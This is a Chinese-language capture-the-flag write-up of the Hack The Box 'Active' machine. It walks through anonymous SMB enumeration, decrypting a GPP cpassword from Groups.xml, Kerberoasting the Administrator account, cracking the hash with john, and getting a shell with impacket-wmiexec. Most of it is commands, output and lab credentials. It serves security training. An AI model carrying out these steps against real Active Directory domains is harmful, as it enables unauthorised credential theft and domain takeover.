HackTheBox Active Directory 101, No.3, Active

靶场:Hack The Box
系统:windows
内容:AD基本操作,GPP,Kerberoasting

一个标准的教学靶机。
扫描端口情况。

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
|_clock-skew: -14m12s
| smb2-time:
|   date: 2024-12-12T07:21:17
|_  start_date: 2024-12-07T09:05:59

空账号枚举smb信息。

~/D/a $smbclient -NL $IP
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

就一个不常见的文件夹Replication,将所有内容递归下载。

~/D/a $smbclient //$IP/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 10:37:44 2018
  ..                                  D        0  Sat Jul 21 10:37:44 2018
  active.htb                          D        0  Sat Jul 21 10:37:44 2018
smb: \> RECURSE on
smb: \> PROMPT off
smb: \> mget *

找到一个Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

里面有个用户名svc_tgs,同时有个加密的密码。这是微软的GPP密码。

GPP 密码是以可被解码的方式存储在 Active Directory 的 SYSVOL 文件夹中。具体来说,这些密码是通过 AES 加密保存的,而加密密钥在 Microsoft 的文档中是公开的。

~/D/a $gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

测试下svc_tgs的权限

~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

枚举所有域用户。

~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --rid-brute
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               498: ACTIVE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.100    445    DC               500: ACTIVE\Administrator (SidTypeUser)
SMB         10.10.10.100    445    DC               501: ACTIVE\Guest (SidTypeUser)
SMB         10.10.10.100    445    DC               502: ACTIVE\krbtgt (SidTypeUser)
SMB         10.10.10.100    445    DC               512: ACTIVE\Domain Admins (SidTypeGroup)
SMB         10.10.10.100    445    DC               513: ACTIVE\Domain Users (SidTypeGroup)
SMB         10.10.10.100    445    DC               514: ACTIVE\Domain Guests (SidTypeGroup)
SMB         10.10.10.100    445    DC               515: ACTIVE\Domain Computers (SidTypeGroup)
SMB         10.10.10.100    445    DC               516: ACTIVE\Domain Controllers (SidTypeGroup)
SMB         10.10.10.100    445    DC               517: ACTIVE\Cert Publishers (SidTypeAlias)
SMB         10.10.10.100    445    DC               518: ACTIVE\Schema Admins (SidTypeGroup)
SMB         10.10.10.100    445    DC               519: ACTIVE\Enterprise Admins (SidTypeGroup)
SMB         10.10.10.100    445    DC               520: ACTIVE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.10.100    445    DC               521: ACTIVE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.100    445    DC               553: ACTIVE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.10.100    445    DC               571: ACTIVE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.100    445    DC               572: ACTIVE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.100    445    DC               1000: ACTIVE\DC$ (SidTypeUser)
SMB         10.10.10.100    445    DC               1101: ACTIVE\DnsAdmins (SidTypeAlias)
SMB         10.10.10.100    445    DC               1102: ACTIVE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.10.100    445    DC               1103: ACTIVE\SVC_TGS (SidTypeUser)

再次以svc_tgs身份登录smb,刚才不可读的用户文件夹下载下来。

~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --shares
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share
SMB         10.10.10.100    445    DC               Replication     READ
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share
SMB         10.10.10.100    445    DC               Users           READ

~/D/a $smbclient //$IP/Users -U 'svc_tgs%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 14:39:20 2018
  ..                                 DR        0  Sat Jul 21 14:39:20 2018
  Administrator                       D        0  Mon Jul 16 10:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 05:06:44 2009
  Default                           DHR        0  Tue Jul 14 06:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 05:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 04:57:55 2009
  Public                             DR        0  Tue Jul 14 04:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 15:16:32 2018

用户文件夹里没找到什么有用的东西。查看有没有服务和用户绑定。

~/D/a/s $impacket-GetUserSPNs  $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18  -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40.351723  2024-12-07 11:21:48.223544

取得服务的TGS hash。

~/D/a/s $impacket-GetUserSPNs  $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18  -dc-ip $IP -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40.351723  2024-12-07 11:21:48.223544

~/D/a/s $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2024-12-12 08:57) 0.2710g/s 2855Kp/s 2855Kc/s 2855KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$15beb8c9ee1a6d1e497ca5873b10a1cf$5f988d42cc06a589c3e5d091da8f331632388270325fef5bd99199c627005a8558c2f8a2138b14793b5585b31907caaad6080abf728a3878fe1b9ad2b91ac4efda356b6f6ca149d04fa9e6f09bf95e85752e16f7c9b1ee2fab7634a2f56f8c48a45a591f0f2410f0cc2fafea700aa51b3672bc52af85bcdbebf9f07f687e2fef4905d240a598a84d469d6e5029ab2cd3fac4918012e363e67132c2681e75b97fcd550560994cf3efd1f3a76e267c33e60456d8726802b95eaf40db385cbbb2820d6fadfc7c991c6c96f511c13c1e2a152c33b4496000decf4926b5de45b09745a041255e875f8543ed496932eaa2aa818fb7e6625ccefc1efdf50e607a6ee0629bfc6b3cc4ce25ad997afaeacb7b1e1b138b00131dba49d76ce6a57d34e9733e5ac542dc13bf765849c731470d913edafe3b422485c2880e3ce9b6d91469f6f5d6c0ba51152acd2267de34a57cffabbcbeae4e10540737c3eb23ad587269d2d10b5ff2d9d5cc12d15b54c1fa27d8114374c5cabe7f9461ee1b6926c31b6366d9a7706bc9e212caaaae7613615894de6877293bd33ebf2ba7ade4591d756866729bd0300be4ee59cdb7ff7e2b6dd6a311f013e5b6aa87d2a42ead5995ad5cbb244fa9e4a8395eb4aec10920d66568a289fd7b54768fa9e8b907c6784040b24ee9ebe010229306e51ff7813455a5c29d3448e7aa94698fe4551d1fcd161975374d1dec650154d06eff3b3c232ab782e32c812f640579d0352a05f9d4843109e273604fc86501cd5d5d34136c1e850dbf08d0222721d4c4a586570981140da4ee1e0b84b24f21fa686b5d14854a75a3909ef57a14f140a2b04de497a09e7d3da3dd83ebe8c5eeed27eb05e390750a80b3fd88f6b8ad5ed64de58dfbcf11af72a2f94c7c7491e1f1037fa85830bcbaeefd11b05dabe72824def22621743f7831ed38fd7ddc968933303a4d3376684ef02bd561be59b0412cf361a23fb21d4a9d18b90f4e6e42b5c78a8d7ec2d26e7ffd38933acb50b3ef9bf993ff2898ea82c6b361d6afd44deb5e07960b8623e7b13271ca5175133540b1192303baba9f06c2b28a310cc8fc321a0491897fd4e9d4c6d2cf02b169c67c1019733ef43239d8a69a9f034d2086c9950f0968bdc18544b61e3a214d8c664f4109e09558f508155c5db2b75667170b07a04a72b89e206bb12ee374d0ab0ead46b2ac919a7c6ca945251d95a2762c328143dc6c0ad6d93b48ff36ca90c08292a2f7f5b80f

破解后可以得到administrator密码,并登录shell。

~/D/a/s $netexec smb $IP -u administrator -p Ticketmaster1968
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

~/D/a/s $impacket-wmiexec $DOMAIN/administrator:'Ticketmaster1968'@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注